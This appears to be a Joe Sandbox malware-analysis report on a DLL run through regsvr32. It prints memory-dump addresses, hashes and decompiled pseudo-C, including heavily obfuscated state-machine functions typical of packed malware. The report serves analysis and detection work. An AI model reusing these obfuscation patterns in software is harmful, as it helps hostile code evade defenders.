0x1000bc0e
0x1000bc15
0x1000bc1c
0x1000bc23
0x1000bc2d
0x1000bc30
0x1000bc33
0x1000bc3a
0x1000bc41
0x1000bc48
0x1000bc4f
0x1000bc56
0x1000bc5d
0x1000bc64
0x1000bc6f
0x1000bc72
0x1000bc79
0x1000bc80
0x1000bc87
0x1000bc92
0x1000bc95
0x1000bc9c
0x1000bca3
0x1000bcae
0x1000bcb1
0x1000bd1e
0x1000bd1e
0x1000bd22
0x00000000
0x00000000
0x1000bcbe
0x1000bd0c
0x1000bd16
0x1000bd18
0x1000bcc0
0x1000bcd0
0x1000bcd5
0x1000bcdb
0x1000bd2b
0x1000bcdd
0x1000bce4
0x1000bcf3
0x1000bd04
0x1000bd09
0x00000000
0x1000bd09
0x1000bcdb
0x1000bcbe
0x1000bd2a

Strings

], xrefs: 1000BC41
?-, xrefs: 1000BB44
ID<, xrefs: 1000BB8F
$Fh, xrefs: 1000BC80
3H1-, xrefs: 1000BBD9
"), xrefs: 1000BB88

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ?-$")$$Fh$3H1-$ID<$]
API String ID: 0-3929424130
Opcode ID: b47be041d90498b0fb0ccd659d10136b39795c8c38ec62054f2f165545d0f0d9
Instruction ID: 636e612c180e15a2a4685d0caea0b75df34c74ef12b93b3c7bb3cc009e732b04
Opcode Fuzzy Hash: b47be041d90498b0fb0ccd659d10136b39795c8c38ec62054f2f165545d0f0d9
Instruction Fuzzy Hash: 8B51F0B1C0130AEBDF18CFA5D98A9EEFBB1FB48314F208159D511B62A0D3B56A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6DA59DE2 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6DA59DE2(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x6da82744; // 0x616b45bb
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x6da85d58 = _t6;
				 *0x6da85d54 = _t22;
				 *0x6da85d50 = _t25;
				 *0x6da85d4c = _t21;
				 *0x6da85d48 = _t27;
				 *0x6da85d44 = _t26;
				 *0x6da85d70 = ss;
				 *0x6da85d64 = cs;
				 *0x6da85d40 = ds;
				 *0x6da85d3c = es;
				 *0x6da85d38 = fs;
				 *0x6da85d34 = gs;
				asm("pushfd");
				_pop( *0x6da85d68);
				 *0x6da85d5c =  *_t31;
				 *0x6da85d60 = _v0;
				 *0x6da85d6c =  &_a4;
				 *0x6da85ca8 = 0x10001;
				_t11 =  *0x6da85d60; // 0x0
				 *0x6da85c5c = _t11;
				 *0x6da85c50 = 0xc0000409;
				 *0x6da85c54 = 1;
				_t12 =  *0x6da82744; // 0x616b45bb
				_v812 = _t12;
				_t13 =  *0x6da82748; // 0x9e94ba44
				_v808 = _t13;
				 *0x6da85ca0 = IsDebuggerPresent();
				_push(1);
				E6DA6775F(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x6da74c04);
				if( *0x6da85ca0 == 0) {
					_push(1);
					E6DA6775F(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x6da59de2
0x6da59de2
0x6da59de2
0x6da59de2
0x6da59de2
0x6da59de2
0x6da59de2
0x6da59de8
0x6da59dea
0x6da59dea
0x6da5fb07
0x6da5fb0c
0x6da5fb12
0x6da5fb18
0x6da5fb1e
0x6da5fb24
0x6da5fb2a
0x6da5fb31
0x6da5fb38
0x6da5fb3f
0x6da5fb46
0x6da5fb4d
0x6da5fb54
0x6da5fb55
0x6da5fb5e
0x6da5fb66
0x6da5fb6e
0x6da5fb79
0x6da5fb83
0x6da5fb88
0x6da5fb8d
0x6da5fb97
0x6da5fba1
0x6da5fba6
0x6da5fbac
0x6da5fbb1
0x6da5fbbd
0x6da5fbc2
0x6da5fbc4
0x6da5fbcc
0x6da5fbd7
0x6da5fbe4
0x6da5fbe6
0x6da5fbe8
0x6da5fbed
0x6da5fc01

APIs

IsDebuggerPresent.KERNEL32 ref: 6DA5FBB7
SetUnhandledExceptionFilter.KERNEL32 ref: 6DA5FBCC
UnhandledExceptionFilter.KERNEL32(6DA74C04), ref: 6DA5FBD7
GetCurrentProcess.KERNEL32(C0000409), ref: 6DA5FBF3
TerminateProcess.KERNEL32(00000000), ref: 6DA5FBFA

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 412705977f60bc0e810fd84efac3c5671a03d6d35c55070d06864b6c79f88554
Instruction ID: d1107ec5027e7c2eaef62ed5eb3267c967cdd47ed63b0c47259e2302be454a9c
Opcode Fuzzy Hash: 412705977f60bc0e810fd84efac3c5671a03d6d35c55070d06864b6c79f88554
Instruction Fuzzy Hash: 2821BCBA809384DFDF11DF69C5887643BB4BB0B302F50C01AED0A8A6A1EBB55583CF45

Uniqueness

Uniqueness Score: -1.00%

Function 10015D68 Relevance: 6.6, Strings: 5, Instructions: 374
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E10015D68(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v208;
				char _v224;
				short _v768;
				short _v770;
				intOrPtr _v772;
				signed int _v816;
				char _v1336;
				char _v1856;
				signed int _t390;
				signed int _t393;
				intOrPtr _t397;
				signed int _t398;
				intOrPtr _t405;
				void* _t407;
				void* _t450;
				intOrPtr _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				void* _t474;
				void* _t475;

				_push(_a20);
				_t405 = __ecx;
				_push(_a16);
				_v152 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(__edx);
				_v156 = _v156 & 0x00000000;
				_t475 = _t474 + 0x1c;
				_v168 = 0x9bf962;
				_v164 = 0xc5bf79;
				_t407 = 0xa35a7c8;
				_v160 = 0xeb77e6;
				_v104 = 0x2de04;
				_v104 = _v104 << 0xf;
				_v104 = _v104 + 0xe365;
				_v104 = _v104 ^ 0x6f02e375;
				_v108 = 0xe2d235;
				_v108 = _v108 + 0xffffba78;
				_v108 = _v108 >> 3;
				_v108 = _v108 ^ 0x0013e986;
				_v56 = 0xdfaaf1;
				_v56 = _v56 | 0x29fde932;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x3ff8b798;
				_v68 = 0x138e03;
				_v68 = _v68 | 0x3f67f7a3;
				_t462 = 0x34;
				_v68 = _v68 * 0x19;
				_v68 = _v68 ^ 0x32bed6ce;
				_v16 = 0x558fa;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xffff3b99;
				_v16 = _v16 + 0xffff4099;
				_v16 = _v16 ^ 0x01586463;
				_v116 = 0xeeddb7;
				_v116 = _v116 | 0xe2ca3a24;
				_v116 = _v116 + 0xeb43;
				_v116 = _v116 ^ 0xe2eab681;
				_v120 = 0xbda4b2;
				_v120 = _v120 | 0x9705b0f4;
				_v120 = _v120 ^ 0x97bc1288;
				_v64 = 0xfb1f50;
				_v64 = _v64 << 0xc;
				_v64 = _v64 << 3;
				_v64 = _v64 ^ 0x8fafd71a;
				_v32 = 0x692e94;
				_v32 = _v32 ^ 0xfcd15245;
				_v32 = _v32 >> 1;
				_v32 = _v32 >> 7;
				_v32 = _v32 ^ 0x00f5cbf6;
				_v96 = 0xf12e32;
				_v96 = _v96 + 0x4c92;
				_v96 = _v96 << 9;
				_v96 = _v96 ^ 0xe2fe8d7e;
				_v72 = 0xc562ae;
				_v72 = _v72 << 0xc;
				_v72 = _v72 << 0x10;
				_v72 = _v72 ^ 0xe00da87d;
				_v88 = 0x6cac79;
				_v88 = _v88 / _t462;
				_v88 = _v88 >> 3;
				_v88 = _v88 ^ 0x000ba0a3;
				_v24 = 0x640789;
				_v24 = _v24 * 0x74;
				_v24 = _v24 + 0xffff6c9b;
				_v24 = _v24 * 0x6f;
				_v24 = _v24 ^ 0xa6eacaaf;
				_v40 = 0xdef3e3;
				_v40 = _v40 + 0xffffb45a;
				_v40 = _v40 >> 3;
				_v40 = _v40 + 0x4844;
				_v40 = _v40 ^ 0x001d4266;
				_v84 = 0x9c1481;
				_v84 = _v84 >> 9;
				_v84 = _v84 + 0x140;
				_v84 = _v84 ^ 0x0006e464;
				_v76 = 0x61fe20;
				_t463 = 0x5a;
				_v76 = _v76 / _t463;
				_v76 = _v76 + 0xffff6201;
				_v76 = _v76 ^ 0x000832c0;
				_v48 = 0xcf94dd;
				_t464 = 0x77;
				_v48 = _v48 / _t464;
				_t465 = 7;
				_v48 = _v48 / _t465;
				_v48 = _v48 ^ 0x00065da2;
				_v144 = 0x8ee886;
				_v144 = _v144 + 0xf9ad;
				_v144 = _v144 ^ 0x00829fd0;
				_v100 = 0x836b64;
				_v100 = _v100 | 0x07a51526;
				_v100 = _v100 + 0xffff725a;
				_v100 = _v100 ^ 0x07a40b56;
				_v92 = 0x89a78e;
				_v92 = _v92 + 0x5587;
				_v92 = _v92 << 9;
				_v92 = _v92 ^ 0x13f21715;
				_v136 = 0x58767f;
				_t466 = 0x22;
				_v136 = _v136 / _t466;
				_v136 = _v136 ^ 0x000eb878;
				_v148 = 0xc6d3a1;
				_v148 = _v148 ^ 0x6516783e;
				_v148 = _v148 ^ 0x65dcd249;
				_v20 = 0xb0ed47;
				_v20 = _v20 ^ 0x0c903d27;
				_v20 = _v20 + 0xffff5f8a;
				_t467 = 0x35;
				_v20 = _v20 * 0x61;
				_v20 = _v20 ^ 0x983806c1;
				_v132 = 0x870e63;
				_v132 = _v132 / _t467;
				_v132 = _v132 ^ 0x000492f2;
				_v12 = 0x58160d;
				_t468 = 0x6f;
				_v12 = _v12 / _t468;
				_v12 = _v12 + 0xffff81ab;
				_v12 = _v12 / _t468;
				_v12 = _v12 ^ 0x000352fc;
				_v52 = 0x2780b7;
				_v52 = _v52 + 0x43f8;
				_v52 = _v52 ^ 0xbfa3615f;
				_v52 = _v52 ^ 0xbf82b851;
				_v140 = 0xc958fd;
				_v140 = _v140 + 0x3b92;
				_v140 = _v140 ^ 0x00caeeab;
				_v28 = 0xc4b84d;
				_v28 = _v28 << 0xe;
				_v28 = _v28 >> 1;
				_v28 = _v28 >> 5;
				_v28 = _v28 ^ 0x00b948f2;
				_v128 = 0xb5feb7;
				_v128 = _v128 + 0xffff7e0c;
				_v128 = _v128 ^ 0x00bbf1d5;
				_v112 = 0xf6855c;
				_v112 = _v112 ^ 0x5372f269;
				_t469 = 0x54;
				_v112 = _v112 / _t469;
				_v112 = _v112 ^ 0x00f9e32d;
				_v80 = 0x3a714c;
				_v80 = _v80 + 0xffffdaf5;
				_v80 = _v80 + 0xffff2faf;
				_v80 = _v80 ^ 0x00376b2b;
				_v124 = 0x73c5cd;
				_v124 = _v124 | 0x00e6bac8;
				_v124 = _v124 ^ 0x00f71e09;
				_v44 = 0x31bd16;
				_v44 = _v44 | 0xc1ccc157;
				_v44 = _v44 ^ 0xe50ac6df;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x000c56b9;
				_v36 = 0x1df1e3;
				_v36 = _v36 | 0x0d85e772;
				_v36 = _v36 + 0x8a69;
				_t470 = 0x64;
				_v36 = _v36 / _t470;
				_v36 = _v36 ^ 0x0028b299;
				_v60 = 0xd7c7b7;
				_t471 = 0x48;
				_t461 = _v152;
				_v60 = _v60 * 0x11;
				_v60 = _v60 / _t471;
				_v60 = _v60 ^ 0x003d0bee;
				while(1) {
					L1:
					_t450 = 0x2e;
					do {
						L2:
						while(_t407 == 0x3d8d728) {
							_t390 = _v104;
							__eflags = _v816 & _t390;
							if((_v816 & _t390) == 0) {
								_t393 = _a12( &_v816,  &_v224);
								__eflags = _t393;
								if(_t393 != 0) {
									_t407 = 0xd642446;
									_t450 = 0x2e;
									goto L24;
								}
								_t407 = 0x7d24a85;
								while(1) {
									L1:
									_t450 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v772 - _t450;
							if(_v772 != _t450) {
								L19:
								__eflags = _a20;
								if(_a20 != 0) {
									_push(_v48);
									_push(_v76);
									_push(_v84);
									E1001734A(_v144, __eflags, _v100, _v92, _v136,  &_v1856, E10004BB4(0x100017c4, _v40), _v148, 0x100017c4, _t405);
									E10015D68( &_v1856, _v152, _v20, _v132, _a12, _v12, _a20);
									_t475 = _t475 + 0x40;
									_t398 = E1000B9D7(_v52, _v140, _t401, _v28);
									_t450 = 0x2e;
								}
								L18:
								_t407 = 0xd642446;
								continue;
							}
							__eflags = _v770;
							if(_v770 == 0) {
								goto L18;
							}
							__eflags = _v770 - _t450;
							if(_v770 != _t450) {
								goto L19;
							}
							__eflags = _v768;
							if(_v768 != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t407 == 0x7d24a85) {
							return E1000428C(_t461, _v124, _v44, _v36, _v60);
						}
						if(_t407 == 0xa35a7c8) {
							_v208 = _t405;
							_t407 = 0xe972002;
							continue;
						}
						if(_t407 == 0xcac421b) {
							_t397 = E1000FE4B(_v88, _v24,  &_v816,  &_v1336);
							_t461 = _t397;
							__eflags = _t461 - 0xffffffff;
							if(_t461 == 0xffffffff) {
								return _t397;
							}
							_t407 = 0x3d8d728;
							while(1) {
								L1:
								_t450 = 0x2e;
								goto L2;
							}
						}
						if(_t407 == 0xd642446) {
							_t398 = E1000FA6C(_v128,  &_v816, _v112, _v80, _t461);
							_t475 = _t475 + 0xc;
							asm("sbb ecx, ecx");
							_t407 = ( ~_t398 & 0xfc068ca3) + 0x7d24a85;
							while(1) {
								L1:
								_t450 = 0x2e;
								goto L2;
							}
						}
						_t485 = _t407 - 0xe972002;
						if(_t407 != 0xe972002) {
							goto L24;
						}
						_push(_v16);
						_push(_v68);
						_push(_v56);
						E1000FD5F( &_v1336, _t485, _v120, _v64, E10004BB4(0x10001794, _v108), _t405);
						_t475 = _t475 + 0x1c;
						_t398 = E1000B9D7(_v32, _v96, _t399, _v72);
						_t407 = 0xcac421b;
						goto L1;
						L24:
						__eflags = _t407 - 0xda6e6a2;
					} while (_t407 != 0xda6e6a2);
					return _t398;
				}
			}

0x10015d74
0x10015d79
0x10015d7b
0x10015d7e
0x10015d84
0x10015d87
0x10015d8a
0x10015d8d
0x10015d8e
0x10015d8f
0x10015d94
0x10015d9b
0x10015d9e
0x10015daa
0x10015db4
0x10015db9
0x10015dc3
0x10015dca
0x10015dce
0x10015dd5
0x10015ddc
0x10015de3
0x10015dea
0x10015dee
0x10015df5
0x10015dfc
0x10015e03
0x10015e07
0x10015e0e
0x10015e15
0x10015e22
0x10015e23
0x10015e26
0x10015e2d
0x10015e34
0x10015e38
0x10015e3f
0x10015e46
0x10015e4d
0x10015e54
0x10015e5b
0x10015e62
0x10015e69
0x10015e70
0x10015e77
0x10015e7e
0x10015e85
0x10015e89
0x10015e8d
0x10015e94
0x10015e9b
0x10015ea2
0x10015ea5
0x10015ea9
0x10015eb0
0x10015eb7
0x10015ebe
0x10015ec2
0x10015ec9
0x10015ed0
0x10015ed4
0x10015ed8
0x10015edf
0x10015eeb
0x10015eee
0x10015ef2
0x10015ef9
0x10015f04
0x10015f07
0x10015f12
0x10015f15
0x10015f1e
0x10015f25
0x10015f2c
0x10015f30
0x10015f37
0x10015f3e
0x10015f45
0x10015f49
0x10015f50
0x10015f57
0x10015f63
0x10015f68
0x10015f6b
0x10015f72
0x10015f79
0x10015f85
0x10015f8a
0x10015f92
0x10015f97
0x10015f9a
0x10015fa1
0x10015fab
0x10015fb5
0x10015fbf
0x10015fc6
0x10015fcd
0x10015fd4
0x10015fdb
0x10015fe2
0x10015fe9
0x10015fed
0x10015ff4
0x10016006
0x1001600b
0x10016011
0x1001601b
0x10016025
0x1001602f
0x10016039
0x10016040
0x10016047
0x10016054
0x10016057
0x1001605a
0x10016061
0x1001606f
0x10016072
0x10016079
0x10016083
0x10016088
0x1001608b
0x10016097
0x1001609a
0x100160a3
0x100160aa
0x100160b1
0x100160b8
0x100160bf
0x100160c9
0x100160d3
0x100160dd
0x100160e4
0x100160e8
0x100160eb
0x100160ef
0x100160f6
0x100160fd
0x10016104
0x1001610b
0x10016112
0x1001611e
0x10016123
0x10016128
0x1001612f
0x10016136
0x1001613d
0x10016144
0x1001614b
0x10016152
0x10016159
0x10016160
0x10016167
0x1001616e
0x10016175
0x10016179
0x10016180
0x10016187
0x1001618e
0x10016198
0x1001619d
0x100161a2
0x100161a9
0x100161b4
0x100161b5
0x100161bb
0x100161c3
0x100161c6
0x100161cd
0x100161cd
0x100161cf
0x100161d0
0x00000000
0x100161d0
0x100162d2
0x100162d5
0x100162db
0x100163ac
0x100163af
0x100163b1
0x100163bf
0x100163c4
0x00000000
0x100163c4
0x100163b3
0x100161cd
0x100161cd
0x100161cf
0x00000000
0x100161cf
0x100161cd
0x100162e1
0x100162e8
0x10016311
0x10016311
0x10016315
0x10016317
0x1001631f
0x10016322
0x1001635a
0x1001637a
0x1001637f
0x1001638f
0x10016398
0x10016398
0x10016307
0x10016307
0x00000000
0x10016307
0x100162ea
0x100162f2
0x00000000
0x00000000
0x100162f4
0x100162fb
0x00000000
0x00000000
0x100162fd
0x10016305
0x00000000
0x00000000
0x00000000
0x10016305
0x100161e2
0x00000000
0x100163e6
0x100161ee
0x100162c2
0x100162c8
0x00000000
0x100162c8
0x100161fa
0x100162a6
0x100162ab
0x100162af
0x100162b2
0x100163ef
0x100163ef
0x100162b8
0x100161cd
0x100161cd
0x100161cf
0x00000000
0x100161cf
0x100161cd
0x10016206
0x10016273
0x10016278
0x1001627f
0x10016287
0x100161cd
0x100161cd
0x100161cf
0x00000000
0x100161cf
0x100161cd
0x10016208
0x1001620e
0x00000000
0x00000000
0x10016214
0x1001621c
0x1001621f
0x10016240
0x10016245
0x10016252
0x10016259
0x00000000
0x100163c5
0x100163c5
0x100163c5
0x00000000
0x100161d0

Strings

F$d, xrefs: 10016307
+k7, xrefs: 10016144
F$d, xrefs: 100163BF
F$d, xrefs: 10016200
w, xrefs: 10015DB9

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +k7$F$d$F$d$F$d$w
API String ID: 0-3867346267
Opcode ID: e8ddbe38fd0c21a0ca5e251d5babfb9f23cd5335455a32b3a7cf18941d13a0ad
Instruction ID: 96801718e76fbe5092e3af619f73f0acfd39028cda5f2e00fa8b0115431aebd2
Opcode Fuzzy Hash: e8ddbe38fd0c21a0ca5e251d5babfb9f23cd5335455a32b3a7cf18941d13a0ad
Instruction Fuzzy Hash: A50224B1D003199BDF64CFE5C889ADEBBB1FB44354F208199E519BA260D7B44A89CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10015497 Relevance: 6.5, Strings: 5, Instructions: 250
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10015497(void* __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				char _v140;
				void* __ecx;
				void* _t196;
				signed int _t229;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int* _t278;
				void* _t279;
				void* _t280;
				void* _t281;
				void* _t283;

				_push(_a16);
				_t278 = _a8;
				_t279 = __edx;
				_push(_a12);
				_push(_t278);
				_push(_a4);
				_push(__edx);
				E10009E7D(_t196);
				_v80 = _v80 & 0x00000000;
				_t281 = _t280 + 0x18;
				_v84 = 0xfe4eb2;
				_v40 = 0x635438;
				_t241 = 0x45edf31;
				_v40 = _v40 ^ 0x6d77ef40;
				_v40 = _v40 ^ 0x15e3a9ad;
				_v40 = _v40 ^ 0x78f712d5;
				_v56 = 0x6675d0;
				_v56 = _v56 | 0xb14f31fa;
				_v56 = _v56 ^ 0xb167f385;
				_v72 = 0xe6859e;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 ^ 0x00089692;
				_v8 = 0x708ddc;
				_v8 = _v8 + 0xfb61;
				_v8 = _v8 + 0xfffffd69;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0xc61def2d;
				_v68 = 0xd294b1;
				_v68 = _v68 >> 0xc;
				_v68 = _v68 ^ 0x000be5c0;
				_v48 = 0x59a7cd;
				_t234 = 0x2e;
				_v48 = _v48 * 0x73;
				_v48 = _v48 ^ 0x284b6a4e;
				_v12 = 0xb1dd2d;
				_v12 = _v12 | 0x60c55fa5;
				_v12 = _v12 / _t234;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x000970e3;
				_v28 = 0xab911d;
				_v28 = _v28 << 2;
				_v28 = _v28 | 0xcc99a4fc;
				_v28 = _v28 ^ 0xceb01091;
				_v36 = 0x3a2ae5;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0xa4b602bd;
				_v36 = _v36 ^ 0xa4be0c8c;
				_v64 = 0x1fc986;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x03ffe70e;
				_v20 = 0xec8920;
				_t235 = 0xa;
				_v20 = _v20 / _t235;
				_t236 = 0x4c;
				_v20 = _v20 / _t236;
				_v20 = _v20 + 0xffff1391;
				_v20 = _v20 ^ 0xfff88abc;
				_v60 = 0x225f0;
				_v60 = _v60 | 0xc185d3b0;
				_v60 = _v60 ^ 0xc18b4c21;
				_v52 = 0x6d538b;
				_v52 = _v52 | 0xb70b8e9a;
				_v52 = _v52 ^ 0xb761c3c3;
				_a8 = 0x2b762b;
				_a8 = _a8 ^ 0x14f265e3;
				_t237 = 0x66;
				_a8 = _a8 / _t237;
				_a8 = _a8 << 8;
				_a8 = _a8 ^ 0x345dfcf5;
				_v44 = 0xcd956e;
				_v44 = _v44 + 0xa1ac;
				_v44 = _v44 + 0xbbc8;
				_v44 = _v44 ^ 0x00cabd73;
				_v32 = 0xf46c9a;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 + 0xfffffcbe;
				_v32 = _v32 ^ 0x0004fe18;
				_v76 = 0xabee34;
				_v76 = _v76 + 0xffff0b41;
				_v76 = _v76 ^ 0x00adb5eb;
				_v24 = 0xa0cad;
				_t238 = 0x3f;
				_v24 = _v24 / _t238;
				_v24 = _v24 * 0x45;
				_v24 = _v24 * 0x5b;
				_v24 = _v24 ^ 0x03e0b64b;
				_v16 = 0x5b8a62;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 + 0xffff150e;
				_v16 = _v16 ^ 0xc2a74454;
				_v16 = _v16 ^ 0x3d56fa64;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t241 - 0x88c94c8;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							E10006BDB( *((intOrPtr*)(_t279 + 0x34)), _v64,  &_v140, _v20);
							_t281 = _t281 + 8;
							_t241 = 0x965b018;
							continue;
						} else {
							if(_t241 == 0x5ade4c) {
								_t278[1] = E10021E19(_t279);
								_t241 = 0x5fbeda1;
								continue;
							} else {
								if(_t241 == 0x45edf31) {
									_t241 = 0x5ade4c;
									 *_t278 =  *_t278 & 0x00000000;
									_t278[1] = _v40;
									continue;
								} else {
									if(_t241 == 0x527f681) {
										E10004627(_v48, _t279 + 0x4c, __eflags, _v12,  &_v140);
										_t241 = 0xa2caa9f;
										continue;
									} else {
										if(_t241 == 0x5fbeda1) {
											_push(_t241);
											_t229 = E1001EAA3(_t278[1]);
											 *_t278 = _t229;
											__eflags = _t229;
											if(__eflags != 0) {
												_t241 = 0x9262afd;
												continue;
											}
										} else {
											if(_t241 != 0x75f11b4) {
												goto L24;
											} else {
												E10006BDB( *((intOrPtr*)(_t279 + 0x10)), _a8,  &_v140, _v44);
												_t281 = _t281 + 8;
												_t241 = 0xecafca6;
												continue;
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t278;
						_t195 =  *_t278 != 0;
						__eflags = _t195;
						return 0 | _t195;
					}
					__eflags = _t241 - 0x9262afd;
					if(_t241 == 0x9262afd) {
						E10004603(_v8, _v68, _t278,  &_v140);
						_t241 = 0x527f681;
						goto L24;
					} else {
						__eflags = _t241 - 0x965b018;
						if(_t241 == 0x965b018) {
							E10006BDB( *((intOrPtr*)(_t279 + 0x3c)), _v60,  &_v140, _v52);
							_t281 = _t281 + 8;
							_t241 = 0x75f11b4;
							goto L1;
						} else {
							__eflags = _t241 - 0xa2caa9f;
							if(_t241 == 0xa2caa9f) {
								E10006BDB( *((intOrPtr*)(_t279 + 0x44)), _v28,  &_v140, _v36);
								_t281 = _t281 + 8;
								_t241 = 0x88c94c8;
								goto L1;
							} else {
								__eflags = _t241 - 0xa6adb47;
								if(__eflags == 0) {
									E10004627(_v24, _t279 + 0x14, __eflags, _v16,  &_v140);
								} else {
									__eflags = _t241 - 0xecafca6;
									if(_t241 != 0xecafca6) {
										goto L24;
									} else {
										E10006BDB( *((intOrPtr*)(_t279 + 0x24)), _v32,  &_v140, _v76);
										_t281 = _t281 + 8;
										_t241 = 0xa6adb47;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t241 - 0xba71045;
				} while (__eflags != 0);
				goto L27;
			}

0x100154a3
0x100154a6
0x100154a9
0x100154ab
0x100154ae
0x100154af
0x100154b2
0x100154b4
0x100154b9
0x100154bd
0x100154c0
0x100154c9
0x100154d0
0x100154d5
0x100154dc
0x100154e3
0x100154ea
0x100154f1
0x100154f8
0x100154ff
0x10015506
0x1001550a
0x10015511
0x10015518
0x1001551f
0x10015526
0x1001552a
0x10015531
0x10015538
0x1001553c
0x10015543
0x10015550
0x10015553
0x10015556
0x1001555d
0x10015564
0x10015572
0x10015575
0x10015579
0x10015580
0x10015587
0x1001558b
0x10015592
0x10015599
0x100155a0
0x100155a4
0x100155ab
0x100155b2
0x100155b9
0x100155bd
0x100155c4
0x100155ce
0x100155d3
0x100155db
0x100155de
0x100155e1
0x100155e8
0x100155ef
0x100155f6
0x100155fd
0x10015604
0x1001560b
0x10015612
0x10015619
0x10015620
0x1001562e
0x10015633
0x10015638
0x1001563c
0x10015643
0x1001564a
0x10015651
0x10015658
0x1001565f
0x10015666
0x1001566a
0x10015671
0x10015678
0x1001567f
0x10015686
0x1001568d
0x10015697
0x1001569f
0x100156a6
0x100156ad
0x100156b0
0x100156b7
0x100156be
0x100156c2
0x100156c9
0x100156d0
0x100156d0
0x100156d7
0x100156d7
0x100156d7
0x100156d7
0x100156d9
0x00000000
0x00000000
0x100156df
0x100157ad
0x100157b2
0x100157b5
0x00000000
0x100156e5
